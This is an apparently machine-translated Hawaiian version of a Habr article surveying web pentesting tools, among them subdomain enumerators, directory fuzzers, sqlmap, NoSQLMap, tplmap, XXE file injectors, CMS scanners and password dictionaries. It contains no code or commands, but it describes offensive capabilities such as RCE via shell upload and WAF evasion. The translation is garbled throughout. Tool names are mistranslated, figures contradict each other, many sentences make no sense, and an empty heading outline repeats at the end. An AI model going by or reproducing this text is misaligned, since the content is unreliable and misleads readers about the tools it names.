🥇 Nā mea hana pūnaewele, a ma hea e hoʻomaka ai ma ke ʻano he pentester?

E hoʻomau e kamaʻilio e pili ana i nā mea hana pono no nā pentesters. Ma ka ʻatikala hou e nānā mākou i nā mea hana no ka nānā ʻana i ka palekana o nā noi pūnaewele.

ʻO kā mākou hoa hana Aloha Ua hana mua wau i kekahi mea e like me kēia ka houluulu ana ʻehiku paha makahiki i hala. He mea hoihoi ka ʻike ʻana i nā mea hana i hoʻopaʻa a hoʻoikaika i ko lākou mau kūlana, a ʻo nā mea i nalowale i ke kua a ʻaʻole i hoʻohana ʻia i kēia manawa.

E hoʻomanaʻo e pili pū ana kēia me Burp Suite, akā aia kahi paʻi ʻokoʻa e pili ana iā ia a me kāna mau plugins pono.

Nā mea:

ʻAhaʻi
Altdns
me metotone
MassDNS
nsec3map
Acunetix
Dirsearch
wfuzz
ffuf
mea kūʻai aku
Arjun
LinkFinder
JSParser
sqlmap
NoSQLMap
oxml_xxe
tplmap
CeWL
Weakpass
AEM_hacker
JoomScan
WPScan

ʻAhaʻi

ʻAhaʻi - he mea hana Go no ka huli ʻana a me ka helu ʻana i nā subdomain DNS a me ka palapala ʻana i ka pūnaewele waho. ʻO Amass kahi papahana OWASP i hoʻolālā ʻia e hōʻike i ke ʻano o nā hui ma ka Pūnaewele me kahi mea ʻē aʻe. Loaʻa iā Amass nā inoa subdomain ma nā ʻano like ʻole; hoʻohana ka mea hana i ka helu recursive o nā subdomains a me nā ʻimi kumu wehe.

No ka ʻike ʻana i nā ʻāpana pūnaewele pili a me nā helu ʻōnaehana autonomous, hoʻohana ʻo Amass i nā helu IP i loaʻa i ka wā o ka hana. Hoʻohana ʻia nā ʻike āpau i loaʻa no ke kūkulu ʻana i kahi palapala ʻāina.

Kākoʻo:

Aia nā ʻenehana hōʻiliʻili ʻike:
* DNS - ʻimi puke wehewehe ʻōlelo o nā subdomains, bruteforce subdomains, ʻimi akamai me ka hoʻohana ʻana i nā mutations e pili ana i nā subdomains i loaʻa, hoʻohuli i nā nīnau DNS a huli i nā kikowaena DNS kahi e hiki ai ke hana i kahi noi hoʻololi ʻāina (AXFR);

* Huli kumu wehe - E nīnau, Baidu, Bing, CommonCrawl, DNSDB, DNSDumpster, DNSTable, Dogpile, Exalead, FindSubdomains, Google, IPv4Info, Netcraft, PTRArchive, Riddler, SiteDossier, ThreatCrowd, VirusTotal, Yahoo;

* Huli i nā waihona palapala hōʻoia TLS - Censys, CertDB, CertSpotter, Crtsh, Entrust;

* Ke hoʻohana nei i nā API ʻenekini hulina - BinaryEdge, BufferOver, CIRCL, HackerTarget, PassiveTotal, Robtex, SecurityTrails, Shodan, Twitter, Umbrella, URLScan;

* Huli i nā waihona pūnaewele pūnaewele: ArchiveIt, ArchiveToday, Arquivo, LoCArchive, OpenUKArchive, UKGovArchive, Wayback;
Hoʻohui me Maltego;
Hāʻawi i ka uhi piha piha o ka hana o ka ʻimi ʻana i nā subdomains DNS.

ʻAla:

E akahele me amass.netdomains - e ho'āʻo ʻo ia e hoʻokaʻaʻike i kēlā me kēia IP address ma ka ʻenehana i ʻike ʻia a loaʻa nā inoa inoa mai nā huli hulina DNS a me nā palapala hōʻoia TLS. He ʻenehana "kiʻekiʻe" kēia, hiki iā ia ke hōʻike i kāu mau hana naʻauao ma ka hui e hoʻokolokolo ʻia nei.
ʻO ka hoʻomanaʻo hoʻomanaʻo kiʻekiʻe, hiki ke hoʻopau i ka 2 GB o RAM i nā ʻano like ʻole, ʻaʻole ia e ʻae iā ʻoe e holo i kēia mea hana i ke ao ma kahi VDS maʻalahi.

Altdns

Altdns - he mea hana Python no ka hōʻuluʻulu ʻana i nā puke wehewehe ʻōlelo no ka helu ʻana i nā subdomain DNS. Hiki iā ʻoe ke hana i nā ʻano like ʻole o nā subdomains me ka hoʻohana ʻana i nā hoʻololi a me nā hoʻololi. No kēia, hoʻohana ʻia nā huaʻōlelo i ʻike pinepine ʻia ma nā subdomains (no ka laʻana: hoʻāʻo, dev, staging), hoʻohana ʻia nā hoʻololi a me nā hoʻololi i nā subdomain i ʻike mua ʻia, hiki ke waiho ʻia i ka hoʻokomo Altdns. ʻO ka mea hoʻopuka he papa inoa o nā ʻano like ʻole o nā subdomains hiki ke noho, a hiki ke hoʻohana ʻia kēia papa inoa no ka DNS brute force.

Kākoʻo:

Hana maikaʻi me nā pūʻulu ʻikepili nui.

me metotone

me metotone - ua ʻike mua ʻia ʻo ia ma ke ʻano he mea hana ʻē aʻe no ka ʻimi ʻana i nā subdomains, akā ua haʻalele ka mea kākau i kēia no ka Amass i ʻōlelo ʻia ma luna. I kēia manawa ua kākau hou ʻia ka aquatone ma Go a ʻoi aku ka mākaukau no ka ʻike mua ʻana ma nā pūnaewele. No ka hana ʻana i kēia, hele ʻo aquatone i nā kikowaena kikoʻī a ʻimi i nā pūnaewele ma nā awa like ʻole, a laila e hōʻiliʻili i nā ʻike āpau e pili ana i ka pūnaewele a lawe i kahi kiʻi. Maikaʻi no ka hoʻomaka mua ʻana o nā pūnaewele, a laila hiki iā ʻoe ke koho i nā pahuhopu mua no ka hoʻouka ʻana.

Kākoʻo:

Hoʻokumu ka hopena i kahi hui o nā faila a me nā waihona i maʻalahi e hoʻohana i ka wā e hana hou ai me nā mea hana ʻē aʻe:
* Hōʻike HTML me nā kiʻi kiʻi i hōʻiliʻili ʻia a me nā poʻo pane i hui pū ʻia e ka like;

* He waihona me nā URL āpau i loaʻa ai nā pūnaewele;

* Kōnae me nā helu helu a me ka ʻikepili ʻaoʻao;

* He waihona me nā faila i loaʻa nā pane pane mai nā pahuhopu i loaʻa;

* He waihona me nā faila i loaʻa ke kino o ka pane mai nā pahuhopu i loaʻa;

* Nā kiʻi o nā pūnaewele i loaʻa;
Kākoʻo i ka hana ʻana me nā hōʻike XML mai Nmap a me Masscan;
Ke hoʻohana nei i ka Chrome/Chromium poʻo ʻole e hana i nā kiʻi paʻi kiʻi.

ʻAla:

Hiki iā ia ke huki i ka manaʻo o nā ʻōnaehana ʻike intrusion, no laila pono ia i ka hoʻonohonoho.

Ua lawe ʻia ke kiʻi paʻi kiʻi no kekahi o nā mana kahiko o ka aquatone (v0.5.0), kahi i hoʻokō ʻia ai ka hulina subdomain DNS. Hiki ke loaʻa nā mana kahiko ma hoʻokuʻu ʻaoʻao.

MassDNS

MassDNS he mea hana ʻē aʻe no ka ʻimi ʻana i nā subdomain DNS. ʻO kāna ʻokoʻa nui ʻo ia ka hana pololei ʻana i nā nīnau DNS i nā mea hoʻonā DNS like ʻole a hana pēlā me ka wikiwiki.

Kākoʻo:

ʻO ka wikiwiki - hiki ke hoʻoholo ma mua o 350 tausani inoa i kēlā me kēia kekona.

ʻAla:

Hiki i ka MassDNS ke hoʻokau nui i nā mea hoʻonā DNS i hoʻohana ʻia, hiki ke alakaʻi i ka pāpā ʻana i kēlā mau kikowaena a i ʻole nā hoʻopiʻi i kāu ISP. Eia kekahi, e kau ia i kahi ukana nui ma nā kikowaena DNS o ka hui, inā loaʻa iā lākou a inā he kuleana lākou no nā kikowaena āu e hoʻāʻo nei e hoʻoholo.
ʻO ka papa inoa o nā mea hoʻonā i kēia manawa, akā inā koho ʻoe i nā mea hoʻonā DNS haʻihaʻi a hoʻohui i nā mea hou i ʻike ʻia, e maikaʻi nā mea a pau.

Kiʻi o ka aquatone v0.5.0

nsec3map

nsec3map he mea hana Python no ka loaʻa ʻana o kahi papa inoa piha o nā kāʻei kapu DNSSEC.

Kākoʻo:

ʻIke koke i nā pūʻali ma nā ʻāpana DNS me ka helu liʻiliʻi o nā nīnau inā hiki ke kākoʻo DNSSEC i ka ʻāpana;
Loaʻa i kahi plugin no John the Ripper i hiki ke hoʻohana ʻia e haki i nā hashes NSEC3 hopena.

ʻAla:

ʻAʻole mālama pono ʻia nā hewa DNS he nui;
ʻAʻohe ʻano like like o ka hoʻoili ʻana i nā moʻolelo NSEC - pono ʻoe e puʻunaue lima i ka inoa inoa;
Hoʻohana hoʻomanaʻo kiʻekiʻe.

Acunetix

Acunetix - he mīkini paʻi paʻa pūnaewele e hoʻokaʻawale i ke kaʻina hana o ka nānā ʻana i ka palekana o nā noi pūnaewele. E hoʻāʻo i ka noi no nā inikini SQL, XSS, XXE, SSRF a me nā mea nāwaliwali pūnaewele ʻē aʻe. Eia nō naʻe, e like me nā mea scanner ʻē aʻe, ʻaʻole e hoʻololi nā ʻano o nā nāwaliwali o ka pūnaewele i kahi pentester, no ka mea ʻaʻole hiki iā ia ke ʻike i nā kaulahao paʻakikī o nā nāwaliwali a i ʻole nā pilikia i ka loiloi. Akā, uhi ia i nā ʻano palupalu like ʻole, me nā CVE like ʻole, i poina paha i ka pentester, no laila he mea maʻalahi loa ia no ka hoʻokuʻu ʻana iā ʻoe mai nā loiloi maʻamau.

Kākoʻo:

Haʻahaʻa haʻahaʻa o nā mea maikaʻi ʻole;
Hiki ke lawe ʻia nā hopena ma ke ʻano he hōʻike;
Hana i ka helu nui o nā loiloi no nā nāwaliwali like ʻole;
Ka nānā ʻana like ʻole o nā pūʻali lehulehu.

ʻAla:

ʻAʻohe algorithm deduplication (e noʻonoʻo ʻo Acunetix i nā ʻaoʻao e like me ka hana ʻokoʻa, ʻoiai ke alakaʻi nei lākou i nā URL like ʻole), akā ke hana nei nā mea hoʻomohala;
Pono ka hoʻokomo ʻana ma kahi kikowaena pūnaewele ʻokoʻa, kahi e hoʻopiʻi ai i nā ʻōnaehana mea kūʻai aku me kahi pilina VPN a me ka hoʻohana ʻana i ka scanner ma kahi ʻāpana kaʻawale o ka pūnaewele mea kūʻai aku kūloko;
Hiki i ka lawelawe ma lalo o ke aʻo ʻana ke walaʻau, no ka laʻana, ma ka hoʻouna ʻana i nā mea hoʻouka kaua he nui i ka palapala hoʻopili ma ka pūnaewele, a laila paʻakikī loa i nā kaʻina ʻoihana;
He mea pono ia a, no laila, ʻaʻole ka hoʻonā manuahi.

Dirsearch

Dirsearch - he mea hana Python no nā papa kuhikuhi a me nā faila ma nā pūnaewele.

Kākoʻo:

Hiki ke hoʻokaʻawale i nā ʻaoʻao "200 OK" maoli mai nā ʻaoʻao "200 OK", akā me ka kikokikona "ʻaoʻao ʻaʻole i loaʻa";
Hele mai me ka puke wehewehe'ōlelo maʻalahi i loaʻa ke kaulike maikaʻi ma waena o ka nui a me ka pono huli. Loaʻa i nā ala maʻamau i maʻamau i nā waihona CMS a me nā ʻenehana;
ʻO kāna puke wehewehe'ōlelo pono'ī, e hiki ai iāʻoe ke hoʻokō i ka maikaʻi a me ka maʻalahi i ka heluʻana i nā faila a me nā papa kuhikuhi;
Hoʻopuka maʻalahi - kikokikona maʻamau, JSON;
Hiki iā ia ke hana throttling - kahi hoʻomaha ma waena o nā noi, he mea nui ia no nā lawelawe nāwaliwali.

ʻAla:

Pono e hāʻawi ʻia nā hoʻonui ma ke ʻano he kaula, he mea kūpono ʻole inā pono ʻoe e hele i nā hoʻonui i ka manawa hoʻokahi;
No ka hoʻohana ʻana i kāu puke wehewehe ʻōlelo, pono e hoʻololi iki ʻia i ka format Dirsearch dictionary no ka hana ʻoi loa.

wfuzz

wfuzz - Fuzzer noi pūnaewele Python. ʻO ia paha kekahi o nā mea hana pūnaewele kaulana loa. He mea maʻalahi ke kumu: wfuzz hiki iā ʻoe ke hoʻokaʻawale i kēlā me kēia wahi i kahi noi HTTP, kahi e hiki ai ke hoʻokaʻawale i nā ʻāpana GET/POST, nā poʻomanaʻo HTTP, me nā Kuki a me nā poʻomanaʻo hōʻoia ʻē aʻe. I ka manawa like, he mea maʻalahi hoʻi ia no ka ikaika maʻalahi o nā papa kuhikuhi a me nā faila, kahi āu e makemake ai i kahi puke wehewehe ʻōlelo maikaʻi. Loaʻa iā ia kahi ʻōnaehana kānana maʻalahi, kahi e hiki ai iā ʻoe ke kānana i nā pane mai ka pūnaewele e like me nā ʻokoʻa like ʻole, e hiki ai iā ʻoe ke hoʻokō i nā hopena kūpono.

Kākoʻo:

Multifunctional - hoʻolālā modular, hui pū kekahi mau minuke;
ʻO ke kānana kūpono a me ka hana fuzzing;
Hiki iā ʻoe ke hoʻokaʻawale i kekahi ʻano HTTP, a me nā wahi āpau i kahi noi HTTP.

ʻAla:

Ma lalo o ka hoʻomohala ʻana.

ffuf

ffuf - he fuzzer pūnaewele ma Go, i hana ʻia ma ke "kiʻi a me ke ʻano" o wfuzz, hiki iā ʻoe ke hoʻopau i nā faila, nā papa kuhikuhi, nā ala URL, nā inoa a me nā waiwai o nā ʻāpana GET/POST, nā poʻomanaʻo HTTP, me ke poʻo poʻomanaʻo no ka ikaika. o nā pūʻali virtual. ʻokoʻa ʻo wfuzz mai kona kaikunāne i ka wikiwiki kiʻekiʻe a me kekahi mau hiʻohiʻona hou, no ka laʻana, kākoʻo ia i nā puke wehewehe wehewehe Dirsearch.

Kākoʻo:

Ua like nā kānana me nā kānana wfuzz, ʻae lākou iā ʻoe e hoʻonohonoho maʻalahi i ka ikaika brute;
E ʻae iā ʻoe e fuzz i nā waiwai poʻomanaʻo HTTP, POST noi ʻikepili a me nā ʻāpana like ʻole o ka URL, me nā inoa a me nā waiwai o nā ʻāpana GET;
Hiki iā ʻoe ke kuhikuhi i kekahi ala HTTP.

ʻAla:

Ma lalo o ka hoʻomohala ʻana.

mea kūʻai aku

mea kūʻai aku - he mea hana Go no ka ʻike ʻana, ʻelua mau ʻano hana. Hoʻohana ʻia ka mea mua e hoʻopau i nā faila a me nā papa kuhikuhi ma kahi pūnaewele, hoʻohana ʻia ka lua no ka hoʻohana ʻana i nā subdomain DNS. ʻAʻole kākoʻo ka hāmeʻa i ka helu helu recursive o nā faila a me nā papa kuhikuhi, ʻoiaʻiʻo, e mālama i ka manawa, akā ma ka ʻaoʻao ʻē aʻe, pono e hoʻokuʻu ʻia ka mana o kēlā me kēia hopena hou ma ka pūnaewele.

Kākoʻo:

ʻO ka wikiwiki kiʻekiʻe o ka hana ʻelua no ka huli ikaika ʻana i nā subdomain DNS a no ka ikaika ikaika o nā faila a me nā papa kuhikuhi.

ʻAla:

ʻAʻole kākoʻo ka mana o kēia manawa i ka hoʻonohonoho ʻana i nā poʻomanaʻo HTTP;
Ma ka paʻamau, ʻo kekahi o nā code status HTTP (200,204,301,302,307) wale nō i manaʻo ʻia he kūpono.

Arjun

Arjun - he mea paahana no ka ikaika ʻino o nā ʻāpana HTTP huna i nā ʻāpana GET/POST, a me JSON. He 25 mau huaʻōlelo i loko o ka puke wehewehe ʻōlelo, a ʻo Ajrun e nānā i loko o 980 kekona. ʻO ka hoʻopunipuni ʻaʻole nānā ʻo Ajrun i kēlā me kēia ʻāpana, akā e nānā i ka ~ 30 mau ʻāpana i ka manawa a ʻike inā ua loli ka pane. Inā ua loli ka pane, hoʻokaʻawale ia i kēia mau ʻāpana 1000 i ʻelua ʻāpana a nānā i kahi o kēia mau ʻāpana e pili ana i ka pane. No laila, me ka hoʻohana ʻana i kahi hulina binary maʻalahi, ʻike ʻia kahi ʻāpana a i ʻole kekahi mau ʻāpana huna i hoʻohuli i ka pane a no laila, hiki ke ola.

Kākoʻo:

ʻO ka wikiwiki kiʻekiʻe ma muli o ka huli binary;
Kākoʻo no nā ʻāpana GET / POST, a me nā ʻāpana i ke ʻano o JSON;

Ke hana nei ka plugin no Burp Suite ma kahi loina like - param-miner, he mea maikaʻi loa i ka ʻimi ʻana i nā ʻāpana HTTP huna. E haʻi hou aku mākou iā ʻoe ma kahi ʻatikala e hiki mai ana e pili ana iā Burp a me kāna mau plugins.

LinkFinder

LinkFinder - he palapala Python no ka ʻimi ʻana i nā loulou i nā faila JavaScript. Maikaʻi no ka ʻimi ʻana i nā huna huna a poina paha i nā wahi hopena/URL ma kahi noi pūnaewele.

Kākoʻo:

wikiwiki;
Aia kahi plugin kūikawā no Chrome ma muli o LinkFinder.

ʻAla:

ʻO ka hopena hope kūponoʻole;
ʻAʻole ia e kālailai iā JavaScript i ka manawa;
He manaʻo maʻalahi loa no ka ʻimi ʻana i nā loulou - inā ʻaʻohe obfuscated ʻo JavaScript, a i ʻole nalo mua nā loulou a hana ʻia me ka ikaika, a laila ʻaʻole hiki ke loaʻa i kekahi mea.

JSParser

JSParser he palapala Python e hoʻohana Pākīpika и JSBeautifier e hoʻokaʻawale i nā URL pili mai nā faila JavaScript. Maikaʻi loa no ka ʻike ʻana i nā noi AJAX a me ka hōʻuluʻulu ʻana i kahi papa inoa o nā ala API e pili ana ka noi. Hana maikaʻi me LinkFinder.

Kākoʻo:

Hoʻopili wikiwiki i nā faila JavaScript.

sqlmap

sqlmap ʻo ia paha kekahi o nā mea hana kaulana loa no ka nānā ʻana i nā noi pūnaewele. Hoʻomaʻamaʻa ʻo Sqlmap i ka ʻimi a me ka hana o SQL injections, hana pū me nā ʻōlelo SQL he nui, a he nui nā ʻano hana like ʻole i kāna arsenal, mai nā huaʻōlelo pololei a hiki i nā vectors paʻakikī no nā injections SQL e pili ana i ka manawa. Eia kekahi, he nui nā ʻenehana no ka hoʻohana hou ʻana i nā DBMS like ʻole, no laila he mea pono ʻaʻole ia he scanner no nā injections SQL, akā he mea hana ikaika no ka hoʻohana ʻana i nā injections SQL i loaʻa mua.

Kākoʻo:

He helu nui o nā ʻenehana like ʻole a me nā vectors;
Ka helu haʻahaʻa o nā mea maikaʻi ʻole;
Nui nā koho hoʻoponopono maikaʻi, nā ʻano hana like ʻole, ka ʻikepili target, nā palapala hoʻopunipuni no ka haʻalele ʻana i ka WAF;
ʻO ka hiki ke hana i ka hoʻokuʻu puka;
Nui nā mana hana like ʻole, no ka laʻana, no kekahi mau waihona - hoʻouka / hoʻoiho ʻana i nā faila, loaʻa ka hiki ke hoʻokō i nā kauoha (RCE) a me nā mea ʻē aʻe;
Kākoʻo no ka hoʻopili pololei ʻana i ka waihona me ka hoʻohana ʻana i ka ʻikepili i loaʻa i ka wā hoʻouka;
Hiki iā ʻoe ke hoʻouna i kahi faila kikokikona me nā hopena o Burp ma ke ʻano he hoʻokomo - ʻaʻole pono e haku lima i nā ʻano laina kauoha āpau.

ʻAla:

He mea paʻakikī ke hoʻopilikino, no ka laʻana, e kākau i kekahi o kāu mau kikoʻī ponoʻī ma muli o ka liʻiliʻi o nā palapala no kēia;
Me ka ʻole o nā hoʻonohonoho kūpono, hana ia i kahi hoʻonohonoho piha ʻole o nā loiloi, hiki ke alakaʻi hewa.

NoSQLMap

NoSQLMap - kahi mea hana Python no ka hoʻomaʻamaʻa ʻana i ka ʻimi a me ka hoʻohana ʻana i nā injections NoSQL. He mea maʻalahi ka hoʻohana ʻana ʻaʻole wale ma nā ʻikepili NoSQL, akā pololei hoʻi i ka wā e loiloi ai i nā noi pūnaewele e hoʻohana ana iā NoSQL.

Kākoʻo:

E like me sqlmap, ʻaʻole ia e ʻike wale i kahi nāwaliwali, akā nānā pū i ka hiki ke hoʻohana ʻia no MongoDB a me CouchDB.

ʻAla:

ʻAʻole kākoʻo ʻo NoSQL no Redis, Cassandra, ke hoʻomaka nei ka hoʻomohala ʻana i kēia kuhikuhi.

oxml_xxe

oxml_xxe - he mea hana no ka hoʻokomo ʻana i ka XXE XML hoʻohana i nā ʻano faila like ʻole e hoʻohana ana i ka format XML ma kekahi ʻano.

Kākoʻo:

Kākoʻo i nā ʻano hoʻohālikelike maʻamau e like me DOCX, ODT, SVG, XML.

ʻAla:

ʻAʻole i hoʻokō piha ʻia ke kākoʻo no PDF, JPEG, GIF;
Hoʻokahi wale nō faila. No ka hoʻoponopono i kēia pilikia hiki iā ʻoe ke hoʻohana i ka hāmeʻa palapala, hiki ke hana i ka nui o nā faila uku ma nā wahi like ʻole.

Hana maikaʻi nā pono hana ma luna o ka hoʻāʻo ʻana iā XXE i ka wā e hoʻouka ai i nā palapala me XML. Akā, e hoʻomanaʻo hoʻi i hiki ke loaʻa nā mea hoʻoponopono format XML i nā hihia ʻē aʻe, no ka laʻana, hiki ke hoʻohana ʻia ʻo XML ma ke ʻano he ʻikepili ma kahi o JSON.

No laila, manaʻo mākou e hoʻolohe ʻoe i ka waihona ma lalo nei, aia ka nui o nā uku uku like ʻole: Uku Uku.

tplmap

tplmap - he mea hana Python no ka ʻike ʻana a me ka hoʻohana ʻana i nā nāwaliwali o Server-Side Template Injection; loaʻa iā ia nā hoʻonohonoho a me nā hae e like me sqlmap. Hoʻohana i nā ʻano hana like ʻole a me nā vectors, me ka injection makapō, a loaʻa nō hoʻi nā ʻenehana no ka hoʻokō ʻana i nā code a me ka hoʻouka ʻana/hoʻouka ʻana i nā faila arbitrary. Eia kekahi, aia i loko o kāna mau ʻenehana arsenal no nā ʻenekini ʻokoʻa like ʻole a me kekahi mau ʻenehana no ka ʻimi ʻana i ka eval () -like code injections ma Python, Ruby, PHP, JavaScript. Inā kūleʻa, wehe ia i kahi console interactive.

Kākoʻo:

He helu nui o nā ʻenehana like ʻole a me nā vectors;
Kākoʻo i nā ʻenekini hoʻohālike he nui;
Nui nā ʻenehana hana.

CeWL

CeWL - he mea hoʻopuka puke wehewehe ʻōlelo ma Ruby, i hana ʻia e unuhi i nā huaʻōlelo kūʻokoʻa mai kahi pūnaewele i kuhikuhi ʻia, e hahai ana i nā loulou ma ka pūnaewele i kahi hohonu kikoʻī. Hiki ke hoʻohana ʻia ka puke wehewehe ʻōlelo i hui ʻia o nā huaʻōlelo kūʻokoʻa no ka hoʻohana ʻana i ka hashcat a i ʻole John the Ripper ma ka pūnaewele hoʻokahi. Maikaʻi i ka wā e hōʻuluʻulu ai i kahi papa inoa o nā ʻōlelo huna.

Kākoʻo:

Maʻalahi e hoʻohana.

ʻAla:

Pono ʻoe e makaʻala me ka hohonu o ka ʻimi ʻana i ʻole e hopu i kahi kikowaena keu.

Weakpass

Weakpass - he lawelawe i loaʻa nā puke wehewehe ʻōlelo he nui me nā ʻōlelo huna kū hoʻokahi. Maikaʻi loa no nā hana like ʻole e pili ana i ka haki ʻana i ka ʻōlelo huna, mai ka maʻalahi maʻalahi o nā moʻokāki ma ka pūnaewele ma nā lawelawe i hoʻopaʻa ʻia, a hiki i ka hoʻohana ʻana i nā hashes ma waho o ka laina. makaʻala ai ole ia, ʻO John The Ripper. Aia ma kahi o 8 biliona mau ʻōlelo huna mai 4 a 25 mau huaʻōlelo ka lōʻihi.

Kākoʻo:

Loaʻa i nā puke wehewehe ʻōlelo kikoʻī a me nā puke wehewehe ʻōlelo me nā huaʻōlelo maʻamau - hiki iā ʻoe ke koho i kahi puke wehewehe wehewehe no kāu pono ponoʻī;
Hoʻonui ʻia nā puke wehewehe ʻōlelo a hoʻopiha ʻia me nā huaʻōlelo hou;
Hoʻokaʻawale ʻia nā puke wehewehe ʻōlelo ma muli o ka pono. Hiki iā ʻoe ke koho i ke koho no ka wikiwiki wikiwiki a me ke koho kikoʻī o nā ʻōlelo huna mai kahi puke wehewehe ʻōlelo me nā leaks hou loa;
Aia kahi calculator e hōʻike ana i ka manawa e hoʻopau ai i nā ʻōlelo huna ma kāu lako.

Makemake mākou e hoʻokomo i nā mea hana no nā loiloi CMS i kahi hui ʻokoʻa: WPScan, JoomScan a me AEM hacker.

AEM_hacker

AEM hacker he mea hana no ka ʻike ʻana i nā nāwaliwali i nā polokalamu Adobe Experience Manager (AEM).

Kākoʻo:

Hiki ke hoʻomaopopo i nā noi AEM mai ka papa inoa o nā URL i waiho ʻia i kāna hoʻokomo;
Loaʻa nā palapala no ka loaʻa ʻana o RCE ma ka hoʻouka ʻana i kahi pūpū JSP a i ʻole ka hoʻohana ʻana iā SSRF.

JoomScan

JoomScan - he mea hana Perl no ka hoʻomaʻamaʻa ʻana i ka ʻike ʻana i nā mea palupalu i ka wā e kau ana iā Joomla CMS.

Kākoʻo:

Hiki ke ʻike i nā hemahema hoʻonohonoho a me nā pilikia me nā hoʻonohonoho hoʻokele;
Hoʻopaʻa inoa i nā mana Joomla a me nā nāwaliwali e pili ana, e like me nā ʻāpana pākahi;
Loaʻa ma mua o 1000 mau mea hoʻohana no nā ʻāpana Joomla;
Puka o nā hōʻike hope ma nā kikokikona a me nā ʻano HTML.

WPScan

WPScan - he mea hana no ka nānā ʻana i nā pūnaewele WordPress, loaʻa iā ia nā nāwaliwali i kāna arsenal no ka mīkini WordPress ponoʻī a no kekahi mau plugins.

Kākoʻo:

Hiki i ka papa inoa ʻaʻole wale nā plugins WordPress palekana a me nā kumumanaʻo, akā loaʻa pū kekahi i kahi papa inoa o nā mea hoʻohana a me nā faila TimThumb;
Hiki ke hana i nā hoʻouka kaua ikaika ma nā pūnaewele WordPress.

ʻAla:

Me ka ʻole o nā hoʻonohonoho kūpono, hana ia i kahi hoʻonohonoho piha ʻole o nā loiloi, hiki ke alakaʻi hewa.

Ma keʻano laulā, makemake nā poʻe ʻokoʻa i nā mea hana like ʻole: maikaʻi lākou a pau i ko lākou ʻano ponoʻī, a ʻaʻole kūpono i ka mea a kekahi kanaka i makemake ai i kekahi. Inā manaʻo ʻoe ua mālama pono ʻole mākou i kekahi mea pono maikaʻi, e kākau e pili ana iā ia ma nā ʻōlelo!

Source: www.habr.com

Nā mea hana pūnaewele, a ma hea e hoʻomaka ai ma ke ʻano he pentester?

Nā mea:

ʻAhaʻi

Kākoʻo:

ʻAla:

Altdns

Kākoʻo:

me metotone

Kākoʻo:

ʻAla:

MassDNS

Kākoʻo:

ʻAla:

nsec3map

Kākoʻo:

ʻAla:

Acunetix

Kākoʻo:

ʻAla:

Dirsearch

Kākoʻo:

ʻAla:

wfuzz

Kākoʻo:

ʻAla:

ffuf

Kākoʻo:

ʻAla:

mea kūʻai aku

Kākoʻo:

ʻAla:

Arjun

Kākoʻo:

LinkFinder

Kākoʻo:

ʻAla:

JSParser

Kākoʻo:

sqlmap

Kākoʻo:

ʻAla:

NoSQLMap

Kākoʻo:

ʻAla:

oxml_xxe

Kākoʻo:

ʻAla:

tplmap

Kākoʻo:

CeWL

Kākoʻo:

ʻAla:

Weakpass

Kākoʻo:

AEM_hacker

Kākoʻo:

JoomScan

Kākoʻo:

WPScan

Kākoʻo:

ʻAla:

Pākuʻi i ka manaʻo hoʻopuka ana pane